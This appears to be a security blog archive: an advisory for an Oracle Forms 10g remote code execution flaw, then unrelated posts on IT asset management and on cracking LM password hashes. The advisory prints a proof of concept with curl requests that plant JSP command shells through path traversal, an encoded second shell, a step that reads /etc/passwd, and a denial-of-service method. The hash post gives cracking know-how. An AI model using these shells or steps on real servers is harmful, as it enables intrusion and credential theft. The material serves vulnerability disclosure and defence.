Advisory: Oracle Forms 10g Unauthenticated Remote Code Execution (CVE-2014-4278)

Vulnerability Description:

Oracle Forms 10g contains code that does not properly validate user input. This could allow an unauthenticated user to execute arbitrary commands on the remote Oracle Forms server.

Also affected: Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.2, 12.2.3 and 12.2.4 [1]

Vulnerability Details:

When a user launches a new Oracle Forms application, the application first invokes the FormsServlet class to initiate connection. The application then invokes the ListenerServlet class, which launches frmweb process in the background of the remote server.

The normal URL to invoke ListenerServlet looks like:,en;q=0.5&ifcmd=getinfo&ifip=

With the above URL, the normal frmweb process is started with the following parameters:

frmweb server webfile=HTTP-0,0,0,em_mode,

Where ifip parameter is controllable by user input. The frmweb executable, however, accepts one more parameter:

frmweb server webfile=HTTP-0,0,0,em_mode,,logfile

A log file, named based on the user supplied log name, is created on the server following the request. The content of the log file contains the log file name:


[Fri May  9 16:46:58 2014 EDT]::Server Start-up Data:
        Server Log Filename: logfile
        Server Hostname: oralin6u5x86
        Server Port: 0
        Server Pool: 1
        Server Process Id: 15638

The Oracle Forms application does not perform adequate input validation on the logfile parameter and allows directory traversal sequences (../). By controlling the ifip parameter passed to the ListenerServlet class, an attacker can now control the logfile location and partially its content as well. Combined with the weak configuration of the remote web server that allows jsp files to be served under https://host:port/forms/java location, attacker could upload a remote shell and execute arbitrary code on the server.

Technical challenges:

The web server does not seem to accept white spaces or new lines; it also limits the number of characters that could be passed onto the frmweb executable. To execute Operating System command, a custom JSP shell was developed that bypass such restrictions.


Proof-of-concept exploit (tested with Oracle Development Suite, installed on Oracle Linux 5u6):

1. Upload first shell to execute commands (see Other Notes for the decoded version):

curl --request GET  ',en;q=0.5&ifcmd=getinfo&ifip=,./java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp'

2. After the first step, attacker could execute OS command via the blind shell, located at:<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues(“cmd”))%3b%25>.jsp. To retrieve the command results, they could use the first blind shell to write the second JSP shell, which was based of fuzzdb’s cmd.jsp [3]

curl --request GET ';%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp?cmd=/bin/sh&amp;cmd=-c&amp;cmd=echo%20PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKiIlPjwlU3RyaW5nIG9wPSIiLHM9IiI7dHJ5e1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7QnVmZmVyZWRSZWFkZXIgc0k9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihwLmdldElu-cHV0U3RyZWFtKCkpKTt3aGlsZSgocz1zSS5yZWFkTGluZSgpKSE9bnVsbCl7b3ArPXM7fX1jYXRjaChJT0V4Y2VwdGlvbiBlKXtlLnByaW50U3RhY2tUcmFjZSgpO30lPjwlPW9wJT4%3d|base64%20--decode%3E./forms/java/cmd.jsp'

3. The second shell is now available at To get the content of /etc/passwd on the remote server:

curl --request GET  ''

Recommendations for Oracle:

  • Create a white list of characters that are allowed to appear in the input and accept input composed exclusively of characters in the approved set.
  • Consider removing support for jsp files on the remote web server if it is not required.

Other notes:

URL-decoded version of the first blind JSP shell:


Base64-decoded version of the second JSP shell:

<%@page import="*"%&gt;&lt;%String op="",s="";try{Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){op+=s;}}catch(IOException e){e.printStackTrace();}%&gt;&lt;%=op%>

Oracle Forms 10g is also vulnerable to a simple DOS attack: each time the URL,en;q=0.5&ifcmd=getinfo&ifip= is invoked, a frmweb process will be launched in the background. An attacker could exhaust server resources simply by requesting the same URL multiple times. I believe this behavior is fixed in version 11g and onwards with connection pooling

For Oracle Forms 11g and onwards, it is still possible to inject into command arguments of the frmweb executable, through a different vector. However the frmweb executable does not seem to recognize that last argument as the log file location; therefore another vulnerability may be required in order to gain code execution.

Since Oracle has ended its support for Forms 10g [2], the patch for Forms 10g itself was not released in the 2014 October CPU [1]. However, it appeared that Forms 10g component is still being used in E-Business Suite; therefore a patch for it was released [1]. If your organization is still using Oracle Forms 10g, I would recommend backport the fix from E-Business Suite, or upgrade to Forms version 11 or newer.

Report Timeline:

  • May 15, 2014: vulnerability was reported to Oracle.
  • June 18, 2014: vulnerability was confirmed by Oracle
  • October 14, 2014: patch released






IT Asset Management – Where to Start

Not enough emphasis is given to IT asset management. This is one of the first things an organization needs to get under control before they can really implement any security program. Yet few people do it well, if at all. How can you possibly protect an environment if you don’t know what assets make up that environment?

Lets quickly define what I mean by “IT asset.” An asset can be any computer, server, network device, application, database, archive of uncompiled code, or whatever that has monetary or perceived value to the business. It’s easy to justify why a piece of hardware or software is an asset, as there is a direct cost involved with procurement, management, and maintenance. You also depreciate your hardware investments in your accounting books, so even those with the checkbooks are acutely aware of hardware costs and value. The not-so-obvious items are web applications and databases. Some disagree that a database is an “asset” but what if that database contains your entire customer list? Isn’t that important to the business? Essentially, if your IT department spends time working on, fixing, installing, or maintaining it as a part of their day-to-day duties, it’s probably an asset.

There are some very basic questions you should be able to answer with a high level of precision about your assets and, if you can’t, IT assets aren’t being managed properly in your organization.

Let me give you an example:

  • How many physical servers do you have?
  • How many laptops does the business own?
  • When were assets purchased?
  • How many servers are physical vs. virtual?
  • What operating systems are your systems running (and what are their patch levels)?
  • What MAC addresses are assigned to each system?
  • Who owns each server? How do you get ahold of them? Who is the second point of contact if they’re not available?
  • How many web applications do you have?
  • How many licenses of Microsoft Office do you have?
  • What is your total annual maintenance commitment for software?
  • What is the circuit ID of your main Internet connection and what is the best number to call in case of an outage? (You don’t want to have to look through years of bills to try and identify this when your business is down.)

You should be able to answer all of those questions pretty quickly by looking at an IT asset management database. You don’t have to spend millions on the shiniest box with the prettiest light array. You can do an adequate job with a spreadsheet, SharePoint, and/or a home-grown application.

Here are some items you may find useful to track:

  • AssetID
  • Asset type: circuit, server, desktop, laptop, router, switch, web application, standalone application, database, SAN head, NAS head, disk shelf, firewall, bridge, thin WAP, thick WAP, wifi controller, other.
  • Purchased from?
  • Sales contact name
  • Sales contact number
  • Sales contact email
  • Purchase date
  • Purchase order number
  • Purpose
  • Physical location (Minneapolis, 511, rack 12, position 13-15)
  • Unit cost
  • Maintenance cost
  • Deploy date
  • Retirement date / lifecycle information
  • Data classification
  • Server classification
  • Circuit ID
  • Emergency contact name
  • Emergency contact number
  • Emergency contact email
  • Service Level Agreement (SLA)
  • Make
  • Model
  • PSU (single, dual, n+1, n+2, other)
  • CPU
  • Memory
  • IP addresses associated
  • Hostnames
  • MAC addresses
  • Operating system (very specific)
  • Virtual/physical
  • Physical host ID (another AssetID if virtual)
  • Has virtual guests? (is a virtual host)
  • Owner & contact info
  • Secondary owner & contact info
  • Upstream dependencies
  • Downstream dependencies
  • Hardware change history
  • Software change history
  • Failure history
  • Patch history
  • Notes

This is not exhaustive. It’s just meant to help organizations get an idea of where to start. The more specific and detailed your asset management database, the more sound the rest of your decisions will be when implementing and enforcing specific company policies. I also like a single database with version control for everything, so you only have a single location where you can find the answers you need. How you normalize your data is up to you, but I prefer a single table for everything. Obviously, if you have tens of millions of assets, this may not be reasonable.

From here you should also consider defining:

  • How your organization is going to perform asset discovery;
  • How you plan to capture the data to populate the database;
  • How you plan to keep it up-to-date and verify the integrity of the data;
  • Acceptable use of assets;
  • Your organization’s official IT asset lifecycle for each major type of asset; and
  • Data and server classification policies.

There are a ton of other policies you probably need to define here as well, but this discussion could quickly fill a library.

Get started today! You’ll find that this isn’t an easy project to get started with but, the sooner you get started and the more effort you put into the process, the easier things will get over time. If you need standards to lean on, have a look at section A.8 of the ISO/IEC 27001:2013 standard, and section 8 of the ISO/IEC 27002:2013 standard. ISO/IEC 27005 in section 8.2.2 helps identify assets your business should include in its risk assessment. PCI DSS version 3.0, requirement 2.4 requires “maintain an inventory of system components that are in scope for PCI.” Cataloging only PCI systems doesn’t seem to fulfill the spirit of the requirement, so I think it’s safe to say PCI requires IT asset management. Additionally requirement 12.2 states, “implement a risk-assessment that Identifies critical assets, threats, and vulnerabilities, and results in a formal risk assessment.” Risk assessments are not possible without first identifying the assets you need to protect. Consider management of all IT assets as a shadow requirement of becoming PCI compliant.


LM Hash Cracking – Rainbow Tables vs GPU Brute Force

Lately, Eric Gruber and I have been speaking about the cracking box that we built at NetSPI. Every time we present, the same question always comes up.

“What about Rainbow Tables?”

Our standard response has been that we don’t need them anymore. I honestly haven’t needed (or heavily used) them for a while now, as our cracking box has been able to crack the majority of the hashes that we throw at it. This got me thinking about what the actual trade offs are for using our GPUs to crack LM hashes versus using the more traditional method of Rainbow Tables.

Windows Hashes

The LAN Manager (or LM) hashing algorithm is the legacy way of storing password hashes in Windows. The replacement (NTLM) has been around for quite a while, but we still see the LM hashing algorithm being used on both local and domain password hashes.

The LM hash format breaks passwords into two parts. Each part can be up to seven characters long. If the password is seven characters or less, the second part is just a blank LM hash. All of the alphabetical characters are converted to upper case, as the LM hash standard is case insensitive. Case sensitivity is stored in the NTLM hashes.

In the example below, the hash for the password “QBMzftvX” is broken into two parts (QBMZFTV and X). You will also see that all of the cleartext characters of these LM hashes are upper-cased.


For the purpose of this blog, I’ll only be covering the trade offs of using Rainbow Tables for LM hashes. There are NTLM Rainbow Tables, and they can be used with great success, but I won’t be covering the GPU/Rainbow Tables comparison for NTLM in this post.

Rainbow Tables

Traditionally, LM hashes have been attacked with Rainbow Tables. It’s easy to create large tables of these password/hash combinations for every possible LM hash, as you only have to create them for one to seven-character combinations. Once you’ve looked up the hash halves in the tables, you toggle cases on the letters to brute force the password for the case-sensitive NTLM hash. This method works well, but disk reads can be slow and sometimes your computer is busy doing other things, so adding in LM table lookups may slow the rest of your system down. Some great advances have been made by multi-threading the table lookups. This ended up being one of the pain points in writing this blog, as I didn’t have the correct multi-threaded Rainbow Table format to use with rcrack_mt. Additionally, the table lookups were helped by the fact that I was using an SSD to house the Rainbow Tables. I included stats for rcrack_mt table look ups for comparison in the table at the end.

There are two major tradeoffs with using Rainbow Tables. The primary one being disk space. The Rainbow Tables themselves can take up a fair amount of space. I know that disk space is relatively cheap now, but five years ago this was a much bigger deal. The second tradeoff is the time it takes to initially generate the tables. If you are not getting the tables off of the internet (also time consuming), you might be taking days (possibly months) to generate the tables.

GPU Cracking

I really can’t give enough credit to the people working on the Hashcat projects. They do a great job with the software and we use it every day. We use oclHashcat to do GPU brute force attacks on the one to seven character LM hashes. Once cracked, the halves are reassembled and a toggle case attack is run with hashcat (CPU version). Using GPUs to do the brute forcing allows us to save some disk space that would typically be used by the LM tables, and it allows us to offload the cracking to our centralized system. Since we’ve scripted it all, I just pull the LM and NTLM hashes into our script and grab a cup of coffee. But does it save us any time?

Hybrid GPU Rainbow Tables

There are programs (RainbowCrack) that allow for a hybrid attack that uses GPU acceleration to do the Rainbow table lookups. I’ve heard that these programs work well, but RainbowCrack only supports the GPU acceleration through Windows, so that means we won’t be using it on our GPU cracking rig.

The Breakdown

For this test, I generated a set of 100 LM/NTLM hashes from randomly generated passwords of various lengths (a mix of 6-14 character lengths). Cracking with Rainbow Tables was done from my Windows laptop (2.70GHz Intel i7, 16 GB RAM, SSD). GPU cracking was done on our GPU cracking box (5 GPUs).

Rainbow Tables (OphCrack*)99/10024 Minutes 5 Seconds
oclHashcat/CPU Hashcat100/10018 Minutes 56 Seconds
Rcracki (multithreaded**)100/1005 Minutes 40 Seconds

*OphCrack 3.6.0 run with the XP Special Tables

**Rcracki_mt running with 24 threads

So after all of this effort, I can’t totally justify saying that using oclHashcat/Hashcat is faster for cracking LM hashes, but given our setup, it’s still pretty fast. That being said, if you don’t have your own GPU cracking rig, you will definitely be better off using Rainbow tables, especially if you multi-thread it on a solid state drive.